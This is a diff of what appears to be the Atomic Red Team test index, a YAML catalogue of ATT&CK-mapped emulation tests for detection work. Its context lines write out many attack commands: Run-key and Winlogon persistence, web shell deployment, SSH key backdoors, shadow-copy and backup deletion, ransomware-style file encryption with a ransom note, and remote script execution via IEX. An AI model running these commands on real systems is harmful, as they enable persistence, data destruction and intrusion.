@@ -42863,7 +42863,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -42874,7 +42874,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1556.004: technique: @@ -43243,11 +43243,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" - ' +' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" - ' +' name: command_prompt T1137.003: technique: @@ -43382,11 +43382,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f - ' +' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f - ' +' T1137.005: technique: external_references: @@ -43507,7 +43507,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -43520,14 +43520,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -43943,7 +43943,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: 
@@ -44155,10 +44155,10 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - ' +' name: command_prompt elevation_required: true T1546.013: @@ -44244,7 +44244,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -44260,13 +44260,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -44484,14 +44484,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -44507,12 +44507,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -44528,7 +44528,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -44654,10 +44654,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1108: 
@@ -44852,11 +44852,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -44874,11 +44874,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -44904,7 +44904,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -45125,10 +45125,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; - ' +' cleanup_command: 'unset ssh_authorized_keys - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -45226,7 +45226,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -45243,10 +45243,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | 
@@ -45282,11 +45282,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -45308,7 +45308,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -45325,7 +45325,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -45336,7 +45336,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -45349,7 +45349,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -45361,7 +45361,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -45497,7 +45497,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: 
@@ -45807,7 +45807,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -45827,22 +45827,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1547.009: technique: @@ -45915,7 +45915,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -46016,10 +46016,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1542.001: @@ -46196,7 +46196,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -46269,15 +46269,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true 
@@ -46714,13 +46714,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed - ' +' prereq_command: 'Get-TransportAgent -TransportService FrontEnd - ' +' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - ' +' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -46932,7 +46932,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -46944,13 +46944,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -46962,7 +46962,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1078: technique: @@ -47131,10 +47131,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) - ' +' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -47143,7 +47143,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} - ' +' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -47416,10 +47416,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -47452,10 +47452,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -47551,11 +47551,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -47574,11 +47574,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -47600,7 +47600,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -47744,7 +47744,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -47752,7 +47752,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -47774,21 +47774,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -48032,10 +48032,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - ' +' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -48065,7 +48065,7 @@ impact: executor: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} - ' +' name: bash T1486: technique: 
@@ -48145,7 +48145,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -48169,10 +48169,10 @@ impact: dependencies: - description: 'Finds where gpg is located - ' +' prereq_command: 'which_gpg=`which gpg` - ' +' get_prereq_command: '' executor: name: bash @@ -48180,15 +48180,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} - ' +' cleanup_command: 'rm #{encrypted_file_path} - ' +' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -48208,10 +48208,10 @@ impact: dependencies: - description: 'Finds where 7z is located - ' +' prereq_command: 'which_7z=`which 7z` - ' +' get_prereq_command: '' executor: name: bash @@ -48226,7 +48226,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. - ' +' supported_platforms: - linux input_arguments: @@ -48253,7 +48253,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file - ' +' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -48267,14 +48267,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi - ' +' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file - ' +' supported_platforms: - linux input_arguments: 
@@ -48302,10 +48302,10 @@ impact: dependencies: - description: 'Finds where openssl is located - ' +' prereq_command: 'which_openssl=`which openssl` - ' +' get_prereq_command: '' executor: name: bash @@ -48328,10 +48328,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - ' +' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - ' +' T1565: technique: external_references: @@ -48982,18 +48982,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. - ' +' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'vssadmin.exe create shadow /for=c: - ' +' executor: command: 'vssadmin.exe delete shadows /all /quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -49006,7 +49006,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -49019,7 +49019,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -49050,7 +49050,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - ' +' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -49064,7 +49064,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup 
@@ -49073,13 +49073,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. - ' +' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 - ' +' name: command_prompt elevation_required: true T1491.001: @@ -49141,7 +49141,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. - ' +' supported_platforms: - windows input_arguments: @@ -49508,7 +49508,7 @@ impact: executor: command: 'yes > /dev/null - ' +' name: bash T1565.003: technique: @@ -49726,10 +49726,10 @@ impact: executor: command: 'sc.exe stop #{service_name} - ' +' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -49748,10 +49748,10 @@ impact: executor: command: 'net.exe stop #{service_name} - ' +' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -49771,7 +49771,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} - ' +' name: command_prompt T1565.001: technique: @@ -49882,7 +49882,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -49893,14 +49893,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. - ' +' supported_platforms: - windows input_arguments: 
@@ -49911,14 +49911,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. - ' +' supported_platforms: - macos - linux @@ -49930,14 +49930,14 @@ impact: executor: command: 'shutdown -r #{timeout} - ' +' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. - ' +' supported_platforms: - macos - linux 
@@ -49949,73 +49949,73 @@ impact: executor: command: 'shutdown -h #{timeout} - ' +' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. - ' +' supported_platforms: - macos - linux executor: command: 'reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt -p - ' +' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt --reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff - ' +' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff --reboot - ' +' name: bash elevation_required: true T1565.002: 
@@ -50186,10 +50186,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) - ' +' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -50199,7 +50199,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 - ' +' name: command_prompt T1217: technique: @@ -50249,7 +50249,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - linux input_arguments: @@ -50263,14 +50263,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -50284,14 +50284,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: 
@@ -50305,7 +50305,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -50318,7 +50318,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force - ' +' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -50330,7 +50330,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks - ' +' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -50342,7 +50342,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite - ' +' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -50353,7 +50353,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites - ' +' name: command_prompt T1087.004: technique: @@ -50800,7 +50800,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -50814,7 +50814,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -50825,7 +50825,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} - ' +' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -50843,18 +50843,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) - ' +' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} - ' +' executor: command: 'Invoke-Expression #{adrecon_path} - ' +' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -50875,14 +50875,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -50904,14 +50904,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -50931,14 +50931,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -50958,14 +50958,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -50974,13 +50974,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account - ' +' supported_platforms: - windows executor: command: 'net user administrator /domain - ' +' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -51003,7 +51003,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed - ' +' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -51024,7 +51024,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} - ' +' T1069.002: technique: external_references: @@ -51092,7 +51092,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name - ' +' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -51114,7 +51114,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -51128,7 +51128,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. - ' +' supported_platforms: - windows executor: @@ -51141,7 +51141,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -51159,39 +51159,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. - ' +' - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - ' +' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
